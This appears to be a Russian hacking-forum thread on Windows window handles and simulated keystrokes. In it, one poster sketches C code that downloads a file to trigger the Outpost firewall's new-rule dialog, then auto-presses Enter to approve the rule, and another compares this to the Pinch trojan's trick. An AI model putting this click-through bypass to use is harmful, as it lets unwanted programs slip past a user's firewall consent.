Изучил довольно много информации по хендлу.Планирую использовать в мирных целях,но думаю и для обхода фаеров пригодиться многим PHP: HWND hWnd; hWnd = FindWindow("Класс приложения", NULL); hWnd = FindWindowEx(hWnd, NULL, "Класс кнопки/строки и прочего", NULL); if (IsWindow(hWnd)) { // Кнопка найдена, работаем с ней } Код работает прекрасно,но ..вот пример: PHP: HWND hWnd; hWnd = FindWindow("Notepad", NULL); hWnd = FindWindowEx(hWnd, NULL, "Edit", NULL); if (IsWindow(hWnd)) { keybd_event(VK_SPACE,0,0,0); keybd_event(VK_SPACE,0,KEYEVENTF_KEYUP,0); } Работа с блокнотом,а точнее эмуляция нажатия кнопок SPACE,проблема в том,что программа (эмуляция) работает корретно,только в случае (!) если Notepad - является (!)активным окном.В противном случа нет.Вопрос,есть ли способы переключения активного окна?Гугль не помог.
Во-первых, я не понял при чём тут обход фаеров? Во-вторых, в "мирных" целях лучше посылать асинхронные сообщения окну, тогда ты будешь точно знать, что это событие предназначалось именно тому, на кого ты расчитывал, а вот насчёт того, что гугль тебе не помог - это не отмазка. Мало того, что в MSDN это есть, так это и в гугле на первых позициях - SetForegroundWindow, SetActiveWindow, SetWindowPos, ActivateWindow. Дальше сам.
groundhog Обдумав 30 секунд набросал: PHP: URLDownloadToFile(NULL, "http://url.succes.txt", "succes.txt", 0, NULL); //дразним оутпост HWND hWnd; hWnd = FindWindow("#32770", NULL); //находим окно создания правила //для нового приложения if (IsWindow(hWnd)) { keybd_event(VK_RETURN,0,0,0); //создаем правило:),по умолчанию задает ему как Web //браузер.поэтому достаточно 1 нажатия :)) } Палиться конечно (выводит сообщения,на переключение активного окна),но ведь за 30 секунд лучше не придумать ) Спасибо учту.Я не люблю отмазываться . Однако не имел понятия про подобные функции.Спасибо.Думаю теперь уже они не понадобяться LEE_ROY Спасибо пошел искать инфу.
Изучив много карт и глобусов, могу твердо заявить: земля КРУГЛАЯ!!!. Я буду использовать эту информацию в мирных целях, хотя ею можно воспользоваться и в других менее мирных целях.
Ну так пинч же тоже по кнопочкам клацал, как бы "обходя" KIS и OUTPOST. Это не обход, это скорее обман
Наконецто пришел котел и раскрыл истину, я уж думал не дождусь. Теперь я тоже умею искать окна по FindWindowEx, проверять окна с помощью IsWindow и нажимать кнопочки по keybd_event. Бойся оутпост, пришло твое время. Вообще, зачем создавать такие темы, мм? Пропалишь же тему..
не говори как, мы, долгие годы молчали и никому не рассказывали об этом секрете, а ты вот взял и спалил всех нах. Как скажи мне мы теперь будем обходить врейвол, ведь бравые бойци из агниума закроют эту дыру. И как нам теперь быть!? Засрал малину?!